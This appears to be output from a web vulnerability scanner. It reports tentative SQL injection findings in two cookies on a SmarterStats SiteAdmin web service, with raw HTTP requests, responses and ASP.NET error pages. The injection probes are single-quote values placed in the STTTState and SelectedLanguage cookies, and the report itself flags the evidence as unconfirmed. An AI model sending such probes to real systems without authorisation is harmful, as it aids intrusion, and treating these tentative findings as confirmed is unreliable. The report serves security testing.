<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetRequestedSettings</h2>
<p class="intro">Gets the requested settings for a site</p>

<h3>Test</h3>

The test form is only available for methods with primitive types as parameters.
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetRequestedSettings"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetRequestedSettings xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;keys&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/keys&gt;
&lt;/GetRequestedSettings&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetRequestedSettingsResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetRequestedSettingsResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GetRequestedSettingsResult&gt;
&lt;values&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/values&gt;
&lt;/GetRequestedSettingsResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetRequestedSettings xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;keys&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/keys&gt;
&lt;/GetRequestedSettings&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetRequestedSettingsResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetRequestedSettingsResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GetRequestedSettingsResult&gt;
&lt;values&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/values&gt;
&lt;/GetRequestedSettingsResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>





</span>









</body>
</html>

2.13. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STTTState cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STTTState cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState='; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=''; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19972
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSite2</h2>
<p class="intro">Adds a site to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSite2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="LogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneIndex:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneIndex"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSite2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;/AddSite2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSite2Result&gt;
&lt;/AddSite2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;/AddSite2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSite2Result&gt;
&lt;/AddSite2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSite2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSite2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.14. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SelectedLanguage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the error returned for the single quote (Response 1 below) is a System.Xml.Schema.XmlSchemaException raised while the ASMX help page compiled the service's WSDL, not a database error, which is why the confidence of this finding is rated Tentative; the difference between the two responses should be confirmed against the application's data-access code before the finding is treated as confirmed.

Request 1

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
